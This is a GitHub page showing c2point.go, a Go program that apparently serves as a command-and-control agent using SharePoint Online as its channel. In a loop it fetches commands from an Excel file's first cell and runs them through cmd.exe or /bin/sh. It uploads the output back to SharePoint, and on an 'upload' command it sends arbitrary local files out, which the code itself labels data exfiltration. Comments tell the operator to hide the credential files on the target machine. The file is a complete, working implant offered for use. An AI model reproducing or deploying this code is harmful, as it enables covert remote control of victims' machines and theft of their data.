-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathc2point.go
160 lines (126 loc) · 4 KB
/
c2point.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
package main
import (
"fmt"
"time"
"log"
"io/ioutil"
"os/exec"
"os"
"strings"
"path/filepath"
"runtime"
"github.com/koltyakov/gosip"
"github.com/koltyakov/gosip/api"
"github.com/tealeg/xlsx/v3"
strategy "github.com/koltyakov/gosip/auth/azurecert"
)
func main() {
// ++++++ Auth on Azure
//
// The only Auth supported for accessing SPOL is through certificate
//
// Create a self-signed cert, upload .cer on Azure Auth of your apps like explained in READMEmd
// Use cert .pfx file and private.json in same folder of executable, after compiling
// HIDING THE .pfx and .json FILES ON TARGET MACHINE IS IN YOUR SCOPE
//
authCnfg := &strategy.AuthCnfg{}
configPath := "private.json"
if err := authCnfg.ReadConfig(configPath); err != nil {
log.Fatalf("Unable to get config: %v", err)
}
client := &gosip.SPClient{AuthCnfg: authCnfg}
sp := api.NewSP(client)
res, err := sp.Web().Select("Title").Get()
if err != nil {
log.Fatal(err)
}
fmt.Printf("Site title: %s\n", res.Data().Title)
// +++++ SET HERE YOUR FILENAME ON SHAREPOINT THAT CONTAINS THE COMMAND
fileName := "yourcommand.xlsx"
// +++++ SET HERE YOUR SHAREPOINT PATH
fileRelativeURL := "/sites/yoursite/Shared Documents/" + fileName
// +++++ SET HERE YOUR OUTPUT PATH
outFile := "output.xlsx"
fileOutputURL := "/sites/yoursite/Shared Documents/" + outFile
// Main Loop: reads - downloads - executes - uploads - sleeps
for {
file, err := sp.Web().GetFile(fileRelativeURL).Download()
if err != nil {
log.Fatalf("Unable to get Excel file: %v", err)
}
folder := sp.Web().GetFolder("Shared Documents")
// Open Excel file
xlFile, err := xlsx.OpenBinary(file)
if err != nil {
log.Fatalf("Unable to open Excel file: %v", err)
}
sheet := xlFile.Sheets[0]
// Cell A1 value
cell, err := sheet.Cell(0, 0)
if err != nil {
log.Fatalf("Unable to read cell: %v", err)
}
cellValue := cell.Value
// Kill switch: exitc2
if cellValue == "exitc2" {
fmt.Println("[C2] Agent Termination Command Received")
break
}
// data exfiltration
if strings.HasPrefix(cellValue, "upload") {
splittedCellValue := strings.Split(cellValue, ";")
fileToUpload := splittedCellValue[1]
content2, err := ioutil.ReadFile(fileToUpload)
if err != nil {
log.Fatal(err)
}
fileName := filepath.Base(fileToUpload)
fileAddResp2, err := folder.Files().Add(fileName,content2,true)
if err != nil {
log.Fatal(err)
}
time.Sleep(1 * time.Second)
fmt.Printf("[Command Executed] Upload of file: %s\n",fileToUpload)
fmt.Printf("[Command Executed] Output file URL: %s\n", fileAddResp2.Data().ServerRelativeURL)
time.Sleep(15 * time.Second)
continue
}
fmt.Println("[C2] Command Requested: " + cellValue)
// exec command - platform aware
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.Command("cmd.exe", "/c", cellValue)
} else {
cmd = exec.Command("/bin/sh", "-c", cellValue)
}
output, err := cmd.Output()
if err != nil {
log.Fatalf("Error in command execution: %v", err)
}
// output print into temp excel file
newCell, err := sheet.Cell(0, 1)
if err != nil {
log.Fatalf("Unable to access cell: %v",err)
}
newCell.SetValue(string(output))
// temporary local save and upload on Sharepoint the output of the command
if err := xlFile.Save("temp.xlsx"); err != nil {
log.Fatalf("Error in excel save: %v", err)
}
content, err := ioutil.ReadFile("temp.xlsx")
if err != nil {
log.Fatal(err)
}
sp.Web().GetFile(fileOutputURL).CheckIn("",2) //locks output file in overwrite mode
fileAddResp, err := folder.Files().Add("output.xlsx",content,true)
if err != nil {
log.Fatal(err)
}
time.Sleep( 1 * time.Second)
sp.Web().GetFile(fileOutputURL).CheckOut //release lock
if err := os.Remove("temp.xlsx"); err != nil{
log.Fatal(err)
}
fmt.Printf("[Command Executed] New file URL: %s\n", fileAddResp.Data().ServerRelativeURL)
}
}